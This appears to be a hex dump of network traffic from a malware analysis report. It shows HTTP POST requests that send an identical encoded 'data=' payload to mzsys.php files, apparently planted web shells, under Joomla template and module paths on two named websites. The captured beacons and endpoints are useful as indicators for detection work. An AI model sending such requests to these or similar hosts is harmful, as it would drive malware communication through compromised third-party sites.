0x00000130 (00304)   38384331 45373936 37453538 33313638   88C1E7967E583168
0x00000140 (00320)   31424532 43344336 46393445 37454344   1BE2C4C6F94E7ECD
0x00000150 (00336)   36323333 30334336 42374431 41463131   623303C6B7D1AF11
0x00000160 (00352)   41453946 41384133 31394336 42344543   AE9FA8A319C6B4EC
0x00000170 (00368)   46383344 45453131 43454634 41413745   F83DEE11CEF4AA7E
0x00000180 (00384)   42333845 31343636 41384233 32433833   B38E1466A8B32C83
0x00000190 (00400)   43394543 35393236 43313939 39323932   C9EC5926C1999292
0x000001a0 (00416)   43463033 41363141 42323031 32354345   CF03A61AB20125CE
0x000001b0 (00432)   43414441 36423731 41374639 34364133   CADA6B71A7F946A3
0x000001c0 (00448)   44383736 44363531 41334542 41334531   D876D651A3EBA3E1
0x000001d0 (00464)   39433231 34304338 31313145 30374646   9C2140C8111E07FF
0x000001e0 (00480)   35333031 45384341 43443537 37323944   5301E8CACD57729D
0x000001f0 (00496)   30363343 41344246 45353746 37333135   063CA4BFE57F7315
0x00000200 (00512)   45314641 32324234 41373444 45463933   E1FA22B4A74DEF93
0x00000210 (00528)   43354535 38314230 31453936 31333833   C5E581B01E961383
0x00000220 (00544)   41354343 44314142 38383345 46313439   A5CCD1AB883EF149
0x00000230 (00560)   36444342 34453446 38323435 45353335   6DCB4E4F8245E535
0x00000240 (00576)   30413437 45353442 39303230 38423944   0A47E54B90208B9D
0x00000250 (00592)   45364539 41433738 33324635 43364637   E6E9AC7832F5C6F7
0x00000260 (00608)   45443239 35393743 44323836 41384432   ED29597CD286A8D2
0x00000270 (00624)   33314333 45434341 41444436 46343631   31C3ECCAADD6F461
0x00000280 (00640)   39364533 44453746 44413032 39453442   96E3DE7FDA029E4B
0x00000290 (00656)   36393145 38334530 36373239 39394141   691E83E0672999AA
0x000002a0 (00672)   35364435 44453645 45394245 35363945   56D5DE6EE9BE569E
0x000002b0 (00688)   44414546 36364134 38373033 37374243   DAEF66A4870377BC
0x000002c0 (00704)   34333436 31453646 33464630 42354338   43461E6F3FF0B5C8
0x000002d0 (00720)   35383841 43303237 36394543 43334534   588AC02769ECC3E4
0x000002e0 (00736)   31393238 39423437 36363730 44314132   19289B476670D1A2
0x000002f0 (00752)   43313243 41373238 44434342 39333845   C12CA728DCCB938E
0x00000300 (00768)   43323042 31314445 30443339 46363646   C20B11DE0D39F66F
0x00000310 (00784)   31373336 34414132 46383036 45433331   17364AA2F806EC31
0x00000320 (00800)   31303039 44334139 44383636 35413835   1009D3A9D8665A85
0x00000330 (00816)   45304539 45433132 35334336 37394137   E0E9EC1253C679A7
0x00000340 (00832)   41373537 32354138 42434239 31374633   A75725A8BCB917F3
0x00000350 (00848)   41463531 45444339 31334342 46333439   AF51EDC913CBF349
0x00000360 (00864)   45393932 38353034 30314636 36364439   E992850401F666D9
0x00000370 (00880)   45444437 45434132 39374330 32433337   EDD7ECA297C02C37
0x00000380 (00896)   45383245 42304630 37344542 37354337   E82EB0F074EB75C7
0x00000390 (00912)   36333045 33344544 38323836 41434433   630E34ED8286ACD3
0x000003a0 (00928)   31374339 46444636 41453436 30443331   17C9FDF6AE460D31
0x000003b0 (00944)   37433946 44463641 45343630 44343630   7C9FDF6AE460D460
0x000003c0 (00960)   44bdf9                                D..

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a206e 2c202c20 2c202c20 2c202c20   t: n, , , , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c200d0a 436f6e74 656e742d 54797065   , ..Content-Type
0x00000090 (00144)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x000000a0 (00160)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000b0 (00176)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000c0 (00192)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x000000d0 (00208)   6e646f77 73204e54 20362e33 3b20574f   ndows NT 6.3; WO
0x000000e0 (00224)   5736343b 20547269 64656e74 2f372e30   W64; Trident/7.0
0x000000f0 (00240)   3b20546f 7563683b 2072763a 31312e30   ; Touch; rv:11.0
0x00000100 (00256)   29206c69 6b652047 65636b6f 0d0a486f   ) like Gecko..Ho
0x00000110 (00272)   73743a20 70617373 6c696674 2e636f6d   st: passlift.com
0x00000120 (00288)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000130 (00304)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000140 (00320)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000150 (00336)   0d0a6461 74613d45 37383843 31453739   ..data=E788C1E79
0x00000160 (00352)   36374535 38333136 38314245 32433443   67E5831681BE2C4C
0x00000170 (00368)   36463934 45374543 44363233 33303343   6F94E7ECD623303C
0x00000180 (00384)   36423744 31414631 31414539 46413841   6B7D1AF11AE9FA8A
0x00000190 (00400)   33313943 36423445 43463833 44454531   319C6B4ECF83DEE1
0x000001a0 (00416)   31434546 34414137 45423338 45313436   1CEF4AA7EB38E146
0x000001b0 (00432)   36413842 33324338 33433945 43353932   6A8B32C83C9EC592
0x000001c0 (00448)   36433139 39393239 32434630 33413631   6C1999292CF03A61
0x000001d0 (00464)   41423230 31323543 45434144 41364237   AB20125CECADA6B7
0x000001e0 (00480)   31413746 39343641 33443837 36443635   1A7F946A3D876D65
0x000001f0 (00496)   31413345 42413345 31394332 31343043   1A3EBA3E19C2140C
0x00000200 (00512)   38313131 45303746 46353330 31453843   8111E07FF5301E8C
0x00000210 (00528)   41434435 37373239 44303633 43413442   ACD57729D063CA4B
0x00000220 (00544)   46453537 46373331 35453146 41323242   FE57F7315E1FA22B
0x00000230 (00560)   34413734 44454639 33433545 35383142   4A74DEF93C5E581B
0x00000240 (00576)   30314539 36313338 33413543 43443141   01E961383A5CCD1A
0x00000250 (00592)   42383833 45463134 39364443 42344534   B883EF1496DCB4E4
0x00000260 (00608)   46383234 35453533 35304134 37453534   F8245E5350A47E54
0x00000270 (00624)   42393032 30384239 44453645 39414337   B90208B9DE6E9AC7
0x00000280 (00640)   38333246 35433646 37454432 39353937   832F5C6F7ED29597
0x00000290 (00656)   43443238 36413844 32333143 33454343   CD286A8D231C3ECC
0x000002a0 (00672)   41414444 36463436 31393645 33444537   AADD6F46196E3DE7
0x000002b0 (00688)   46444130 32394534 42363931 45383345   FDA029E4B691E83E
0x000002c0 (00704)   30363732 39393941 41353644 35444536   0672999AA56D5DE6
0x000002d0 (00720)   45453942 45353639 45444145 46363641   EE9BE569EDAEF66A
0x000002e0 (00736)   34383730 33373742 43343334 36314536   4870377BC43461E6
0x000002f0 (00752)   46334646 30423543 38353838 41433032   F3FF0B5C8588AC02
0x00000300 (00768)   37363945 43433345 34313932 38394234   769ECC3E419289B4
0x00000310 (00784)   37363637 30443141 32433132 43413732   76670D1A2C12CA72
0x00000320 (00800)   38444343 42393338 45433230 42313144   8DCCB938EC20B11D
0x00000330 (00816)   45304433 39463636 46313733 36344141   E0D39F66F17364AA
0x00000340 (00832)   32463830 36454333 31313030 39443341   2F806EC311009D3A
0x00000350 (00848)   39443836 36354138 35453045 39454331   9D8665A85E0E9EC1
0x00000360 (00864)   32353343 36373941 37413735 37323541   253C679A7A75725A
0x00000370 (00880)   38424342 39313746 33414635 31454443   8BCB917F3AF51EDC
0x00000380 (00896)   39313343 42463334 39453939 32383530   913CBF349E992850
0x00000390 (00912)   34303146 36363644 39454444 37454341   401F666D9EDD7ECA
0x000003a0 (00928)   32393743 30324333 37453832 45423046   297C02C37E82EB0F
0x000003b0 (00944)   30373445 42373543 37363330 45333445   074EB75C7630E34E
0x000003c0 (00960)   44383238 36414344 33313743 39464446   D8286ACD317C9FDF
0x000003d0 (00976)   36414534 363044                       6AE460D

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2061 6374696f 6e706f75   .Host: actionpou
0x00000100 (00256)   72697372 61656c2e 636f6d0d 0a436f6e   risrael.com..Con
0x00000110 (00272)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000120 (00288)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000130 (00304)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000140 (00320)   613d4537 38384331 45373936 37453538   a=E788C1E7967E58
0x00000150 (00336)   33313638 31424532 43344336 46393445   31681BE2C4C6F94E
0x00000160 (00352)   37454344 36323333 30334336 42374431   7ECD623303C6B7D1
0x00000170 (00368)   41463131 41453946 41384133 31394336   AF11AE9FA8A319C6
0x00000180 (00384)   42344543 46383344 45453131 43454634   B4ECF83DEE11CEF4
0x00000190 (00400)   41413745 42333845 31343636 41384233   AA7EB38E1466A8B3
0x000001a0 (00416)   32433833 43394543 35393236 43313939   2C83C9EC5926C199
0x000001b0 (00432)   39323932 43463033 41363141 42323031   9292CF03A61AB201
0x000001c0 (00448)   32354345 43414441 36423731 41374639   25CECADA6B71A7F9
0x000001d0 (00464)   34364133 44383736 44363531 41334542   46A3D876D651A3EB
0x000001e0 (00480)   41334531 39433231 34304338 31313145   A3E19C2140C8111E
0x000001f0 (00496)   30374646 35333031 45384341 43443537   07FF5301E8CACD57
0x00000200 (00512)   37323944 30363343 41344246 45353746   729D063CA4BFE57F
0x00000210 (00528)   37333135 45314641 32324234 41373444   7315E1FA22B4A74D
0x00000220 (00544)   45463933 43354535 38314230 31453936   EF93C5E581B01E96
0x00000230 (00560)   31333833 41354343 44314142 38383345   1383A5CCD1AB883E
0x00000240 (00576)   46313439 36444342 34453446 38323435   F1496DCB4E4F8245
0x00000250 (00592)   45353335 30413437 45353442 39303230   E5350A47E54B9020
0x00000260 (00608)   38423944 45364539 41433738 33324635   8B9DE6E9AC7832F5
0x00000270 (00624)   43364637 45443239 35393743 44323836   C6F7ED29597CD286
0x00000280 (00640)   41384432 33314333 45434341 41444436   A8D231C3ECCAADD6
0x00000290 (00656)   46343631 39364533 44453746 44413032   F46196E3DE7FDA02
0x000002a0 (00672)   39453442 36393145 38334530 36373239   9E4B691E83E06729
0x000002b0 (00688)   39394141 35364435 44453645 45394245   99AA56D5DE6EE9BE
0x000002c0 (00704)   35363945 44414546 36364134 38373033   569EDAEF66A48703
0x000002d0 (00720)   37374243 34333436 31453646 33464630   77BC43461E6F3FF0
0x000002e0 (00736)   42354338 35383841 43303237 36394543   B5C8588AC02769EC
0x000002f0 (00752)   43334534 31393238 39423437 36363730   C3E419289B476670
0x00000300 (00768)   44314132 43313243 41373238 44434342   D1A2C12CA728DCCB
0x00000310 (00784)   39333845 43323042 31314445 30443339   938EC20B11DE0D39
0x00000320 (00800)   46363646 31373336 34414132 46383036   F66F17364AA2F806
0x00000330 (00816)   45433331 31303039 44334139 44383636   EC311009D3A9D866
0x00000340 (00832)   35413835 45304539 45433132 35334336   5A85E0E9EC1253C6
0x00000350 (00848)   37394137 41373537 32354138 42434239   79A7A75725A8BCB9
0x00000360 (00864)   31374633 41463531 45444339 31334342   17F3AF51EDC913CB
0x00000370 (00880)   46333439 45393932 38353034 30314636   F349E992850401F6
0x00000380 (00896)   36364439 45444437 45434132 39374330   66D9EDD7ECA297C0
0x00000390 (00912)   32433337 45383245 42304630 37344542   2C37E82EB0F074EB
0x000003a0 (00928)   37354337 36333045 33344544 38323836   75C7630E34ED8286
0x000003b0 (00944)   41434433 31374339 46444636 41453436   ACD317C9FDF6AE46
0x000003c0 (00960)   30443238 36414344 33313743 39464446   0D286ACD317C9FDF
0x000003d0 (00976)   36414534 363044                       6AE460D


Strings